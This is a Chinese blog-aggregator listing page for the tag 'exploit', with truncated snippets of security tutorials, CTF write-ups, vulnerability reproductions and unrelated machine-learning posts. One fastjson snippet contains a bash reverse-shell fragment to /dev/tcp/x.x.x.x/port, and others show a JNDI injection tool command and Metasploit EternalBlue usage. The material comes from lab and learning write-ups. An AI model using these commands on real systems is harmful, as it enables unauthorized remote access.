exploit

AI学习笔记之——多臂老虎机(Multi-armed bandit)问题

1.探索-利用困境(Explore-Exploitdilemma)多臂老虎机是一个有多个拉杆的赌博机,每一个拉杆的中奖几率是不一样的,问题是:如何在有限
weixin_33962923·2023-12-15 21:21

强化学习笔记5:learning&planning, exploration&exploitation

1learning&planningLearning和Planning是序列决策的两个基本问题。在强化学习中,环境初始时是未知的,agent不知道环境如何工作,agent通过不断地与环境交互,逐渐改进策略。(learning过程)在plannning中,环境是已知的,我们被告知了整个环境的运作规则的详细信息。Agent能够计算出一个完美的模型,并且在不需要与环境进行任何交互的时候进行计算。Agen
UQI-LIUWJ·2023-12-15 21:48

Linux提权

Linux提权方法Linux和Windows一样,也有相对应的脚本进行漏洞扫描,但风险太高,容易把服务器提崩,建议不用https://github.com/InteliSecureLabs/Linux_Exploit_Suggesteruname
config_星辰·2023-12-15 14:23

CTF特训日记day1

首先详细阅读了一下这篇文章:https://roderickchan.github.io/zh-cn/2023-03-01-analysis-of-glibc-heap-exploitation-in-high-version
Ayakaaaa·2023-12-06 04:45

vulnhub靶机练习-Os-hackNos

0x01靶机简介Difficulty:EasytoIntermediateFlag:2FlagfirstuserAndsecondrootLearning:exploit|WebApplication|
Asson·2023-12-04 03:05

Error 403 No valid crumb was included in the request 报错解决 容器化jenkins关闭CSRF

Error403Novalidcrumbwasincludedintherequest原因实际上这是因为jenkins的防止跨站点请求伪造(PreventCrossSiteRequestForgeryexploits
tina_sprunt·2023-12-02 20:27

第五篇红队笔记-百靶精讲之LampSecurityCTF-SSH参数-hashcat密码破解-crackmapexec功能/协议

端口扫描Web渗透SQL手工注入SQLmap自动注入SSH参数补写获得初始系统shellrootedLampSecurityCTF5主机发现端口扫描web渗透-NanoCMS数据泄露利用谷歌nanocmsexploit
zgcadmin·2023-12-02 17:54

盘点 | 安全测试者偏爱的安全测试工具

无线类【点击领取】《工具安装包》免费分享1.Metasploit(免费)2003年,美国网络安全研究员兼开发者Moore启动了Metasploit项目,目的是创建一个开源平台,获取Exploit代码用于研究与开发
网络安全入门到进阶·2023-11-30 23:34

CVE-2016-1897/8 - FFMpeg vulnerability analysis

2019独角兽企业重金招聘Python工程师标准>>>Vulnerabilityexploitmethodsareasfollows:一共4个文件:comm.php(接收用的也可以用监听一个端口)code
weixin_34221112·2023-11-30 10:19

【bsauce读论文】KOOBE:Towards Facilitating Exploit Generation of Kernel Out-Of-Bounds-USENIX2020

摘要:目标:heapout-of-bounds(OOB)堆越界内存写漏洞。原因:a.不同的OOB有不同的漏洞能力;b.构造exp会用到很多syscall,是模块化的过程。成果:本文总结了linux堆OOB漏洞利用的挑战,实现了KOOBE分析框架。给定一个PoC,KOOBE自动分析OOB漏洞并使用符号化追踪来总结PoC的能力,提出新型能力导向型fuzzing来搜索含其他能力的路径,识别合适的targ
bsauce·2023-11-30 01:36

fastjson1.2.47RCE远程命令执行漏洞复现

fastjson&/dev/tcp/x.x.x.x/port0>&1"};Processpc=rt.exec(commands);pc.waitFor();}catch(Exceptione){}}}3.编译成Exploit.class
zyl404·2023-11-29 03:51

Python从配置文件取值

=None#Integer/Noneprefix="ST"#String/NonenumUnit=6#Integer/NonepaddingForNumUnicite=False#BOOLEANnumExploitantEmetteur
naruto2017·2023-11-28 22:31

3、MSF使用

漏洞对靶机执行溢出攻击二、后渗透模块meterpreter的使用一、利用ms17-010漏洞对靶机执行溢出攻击分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:useexploit
PT_silver·2023-11-26 10:17

学习笔记-OS - Exploits

OS-Exploits免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.大纲Linux系统漏洞提权原生软件提权系统配置提权sudosuid远程漏洞
C-haidragon·2023-11-25 23:13

X-RAY POC编写

EXP(Exploit)-漏洞利用EXP,Exploit中文意思是漏洞利用。意思是一段对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利用的
bboywxy8340·2023-11-25 13:03

内网渗透之Linux权限提升大法

文章目录内网渗透|Linux权限提升大法0x01前言0x02工具介绍1.traitor2.LinEnum3.linux-exploit-suggester.sh4.LinuxExploitSuggester25
gaynell·2023-11-25 00:02

linux反汇编教程,Linux 下使用 objdump 反汇编

对于一般只想让自己程序跑起来的程序员,这个命令没有更多意义,对于想进一步了解系统的程序员,应该掌握这种工具,至少你可以自己写写shellcode了,或者看看人家给的exploit中的shellcode是什么东西
木水生·2023-11-24 08:41

kali渗透-6 Exploitation – Low Hanging Fruits

简介这章开始我们会开始涉及渗透测试的的利用层面。和漏洞评估的主要不同是,漏洞评估中测试者识别漏洞(多数时间使用自动化扫描器)和提出如何减轻它们的建议。而渗透测试中测试者作为恶意攻击者并尝试利用检测到的漏洞,并得到最后的结果:整个系统的沦陷,内部网络访问,敏感数据泄露,以及其它。同时,要当心不要影响系统的可用性或者为真正的攻击者留下后门。之前的章节中,我们已经涉及了如何检测Web应用中的一些漏洞。这
jacobouchoioi·2023-11-23 18:27

2018-08-09

Nebula练习这是练习的地址:https://exploit-exercises.com/,第一次写这种文档,并且也就是菜鸟一枚,请各位看官多多指教,有哪里理解有问题,希望能够严厉指出,直击痛处。
疯子小sha·2023-11-22 18:39

Metasploit使用指南

文章目录工具说明安装方法命令讲解show命令search搜索命令use命令info命令show命令run、exploit命令使用方法升级使用模块代理使用工具说明MetasploitFramework(MSF
凌奢·2023-11-22 08:39

SCTF2021_Pwn_dataleak_WP

SCTF2021_dataleak_WP文章目录SCTF2021_dataleak_WP检查文件和保护ida查看ELF文件cJSON_PWNida查看libcjson.so利用思路exploit检查文件和保护
Benson233·2023-11-22 05:35

如何发送一条欺骗短信

启动BackTrack并启动SocialEngineeringToolkit(SET)让我们首先启动Backtrack5,然后导航到Applications->ExploitationTools->SocialEngineeringTools
13049047c237·2023-11-19 05:48

fastjson 1.2.47漏洞复现

fastjson1.2.47rce访问首页用fastjsonscan找到pocjava-jarJNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar-C"touch/tmp
网络安全彭于晏·2023-11-17 17:44

【kali】34 WEB渗透——扫描工具w3af_console

profiles模块4.http-settings模块5.misc-settings(杂项设置)模块6.target模块7.启动8.脚本w3af_console一、简介web扫描框架(开源、不断添加集成exploit
(∪.∪ )...zzz·2023-11-17 11:56

【CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3

0x0002】简易Linux堆利用入门教程byarttnba3老生常谈,[GITHUBBLOGADDR](https://arttnba3.cn/2021/05/10/NOTE-0X05-GLIBC_HEAP-EXPLOIT
arttnba3·2023-11-17 05:20

白帽子讲web安全 笔记(一)

第一章我的安全世界观漏洞利用代码英文“exploit”(开发;剥削;利用),通过exploit实现网络攻击获取root权限是最常见的攻击模式。
秋水木华·2023-11-16 21:14

__builtin_expect(x,0)

abovewecanseebarcaseprecedesfoocase.Sincefoocaseisunlikely,andinstructionsofbararepushedtothepipeline,thrashingthepipelineisunlikely.ThisisagoodexploitationofamodernCPU
raidtest·2023-11-16 02:06

DFIL: Deepfake Incremental Learning by Exploiting Domain-invariant Forgery Clues

一、研究背景1.在大规模数据集上训练后,DeepfakeDetection模型通常可以准确识别已知方法生成的伪造图像。2.由于数据分布的差异,模型检测新技术生成的图片时准确率显著降低。3.亟需一种能够应对多种潜在伪造方法的检测模型。二、研究动机1.难以获取足够新增伪造方法样本,依赖少量样本更新特征分布会造成过拟合。2.伪造检测任务存在数据不平衡问题,新增伪造方法样本远少于已知伪造方法。3.对齐新旧
二苏旧局吖·2023-11-15 13:17

Patch Now and Attack Later - Exploiting S7 PLCs by Time-Of-Day Block(先打补丁后攻击——基于S7 PLC的TOD漏洞)

先打补丁后攻击——基于S7PLC的TOD漏洞一、摘要二、介绍(一)攻击方式及工具(二)PLC(1)PLC执行环境(2)PLC操作系统(3)用户程序(4)PLC周期时间(5)时间中断三、攻击建模四、实验评估五、总结一、摘要  工业控制系统(ICSs)体系结构由可编程逻辑控制器(PLC)组成,其中一端与工程站通信,另一端控制某个物理过程。在本文中,我们证明了一些PLC是脆弱的,并证明了利用正在PLC中
工控小白2021·2023-11-15 07:37

XCTF攻防世界 4-ReeHY-main-100 题解

经过分析,漏洞主要有:在create_exploit函数中的两个整型溢出漏洞,使chunk地址可以写到缓冲区的高地址处在delete_exploit函数中的doublefree漏洞,释放后没有清空指针经过
C0Lin·2023-11-14 23:58

HackTheBox-Starting Point--Tier 2---Base

CustomApplications、SourceCodeAnalysis、Authentication、Apache、PHP、Reconnaissance、WebSiteStructureDiscovery、SUDOExploitation
七天啊·2023-11-13 15:06

刘夏真的简历中国科学院计算机所,专家人才库数据----中国科学院计算技术研究所...

(CCFA)[2]Y.Wang,Y.Han,L.Zhang,H.Li,X.Li,"ProPRAM:ExploitingtheTransparentLogicResou
壹财经·2023-11-13 14:21

二进制基础

最近开始入坑系统安全大坑,调转方向开始了解pwn,那就要补一些那少得可怜的底层基础啦先学几个单词:exploit:用于攻击的脚本与方案payload:攻击载荷,是目标进程被劫持控制流的数据(精心构造的恶意数据
晴空对晚照·2023-11-12 15:16

【安全】漏洞名词扫盲(POC,EXP,CVE,CVSS等)

POC(ProofofConcept)漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在EXP(Exploit)漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本)
qqchaozai·2023-11-12 14:27

Poc/Exp漏洞验证利用脚本编写

2.EXPEXP,Exploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者
wespten·2023-11-12 14:56

HTB——Getting start

Othertools二、Gettingstart1、信息安全包括2、文件夹结构3、commonterm4、Basictools5、serverscanning5、WebEnumeration6、PublicExploits7
PT_silver·2023-11-11 12:23

【深度强化学习】1. 基础部分

1.按照Agent有没有对环境建模来分类2.按照Agent的决策方式来分类时序决策过程动作空间智能体主要组成部分1.Policy2.ValueFunction3.ModelExplorationandExploitation
*pprp*·2023-11-10 13:22

转:Exploiting Windows 10 in a Local Network with WPAD/PAC and JScript

转:https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.htmlaPAColypsenow
335046781·2023-11-09 08:56

python 编写 phpstudy_2016 EXP 漏洞利用脚本之RCE

EXP(Exploit)渗透、攻击;完整的漏洞利用工具RCE(RemoteCode|CommandExecute)*漏洞的类型*在远程目标上执行代码或命令手工验证漏洞的问题:效率准确性针对RCE漏洞开发
ZS_zsx·2023-11-08 09:17

vulfocus Apache log4j2-RCE 漏洞复现(CVE-2021-44228)

在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1
kb2414·2023-11-08 05:56

安全防御——三、网络安全理论知识

安全防御一、安全防御1、网络安全常识及术语资产网络安全网络空间(Cyberspace)漏洞0day1day后门exploit攻击安全策略安全机制社会工程学APT(最新)2、为什么会出现网络安全问题3、什么样的网络是安全的
君衍.⠀·2023-11-07 21:06

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)复现

Shiro漏洞复现前言一、ApacheShiro1.2.4反序列化漏洞(CVE-2016-4437)0x01漏洞描述0x02影响范围0x03漏洞利用1.py脚本2.ShiroExploit.jar工具0x04
LuckyCharm~·2023-11-07 10:51

MOVEit Vulnerability

AnallegedRussian-linkedransomwareganghasexploitedavulnerabilityinapopularfiletransfertoolcalledMOVEittoattackbothcommercialandgovernmenttargetsworld-wide.Thisattackappearstoincludedatatheftaswellasthe
atsec·2023-11-01 10:27

修复WordPress重定向黑客 - WordPress网站重定向到另一个网站

Ifyes,thenyourwebsitemightbehacked.ThefamousWordPressredirecthackisoneofthemostexploitedWPhacksbythehackers.There
给AI装上大脑·2023-11-01 01:53

sklearn.model_selection.learning_curve

learning_curve(estimator,X,y,*,groups=None,train_sizes=array([0.1,0.325,0.55,0.775,1.]),cv=None,scoring=None,exploit_incremental_l
悠扬前奏·2023-10-31 22:25

一款针对SpringBootEnv页面进行快速漏洞利用

参考GitHub-0x727/SpringBootExploit:项目是根据LandGrey/SpringBootVulExploit清单编写,目的hvv期间快速利用漏洞、降低漏洞利用门槛。
安全大哥·2023-10-31 21:21

一款Nacos漏洞自动化工具

1、参考GitHub-charonlight/NacosExploitGUI:Nacos漏洞综合利用GUI工具,集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用0x01前言本工具已经集成
安全大哥·2023-10-31 21:40

MSF专业术语及各个模块及常用命令

渗透攻击(Exploit):渗透攻击是指由攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。流行的攻击技术包括:缓冲区溢出、Web应用程序漏洞攻击,以及利用配置错误等。
小银同学阿·2023-10-31 07:17

渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞

漏洞数据库:https://www.exploit-db.com/google-hacking-database1、渗透测试实用浏览器插件chrome、edge插件:搜索cookie,安装cookieeditor
擒贼先擒王·2023-10-30 06:27

VulnHub Metasploitable-2

一、信息收集nmap扫描访问80端口二、漏洞利用1.漏洞一1.vsftpd2.3.4(CVE-2011-2523)2.msfmsf6>searchvsftpdmsf6>use0msf6exploit(unix
hacker-routing·2023-10-29 16:43
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他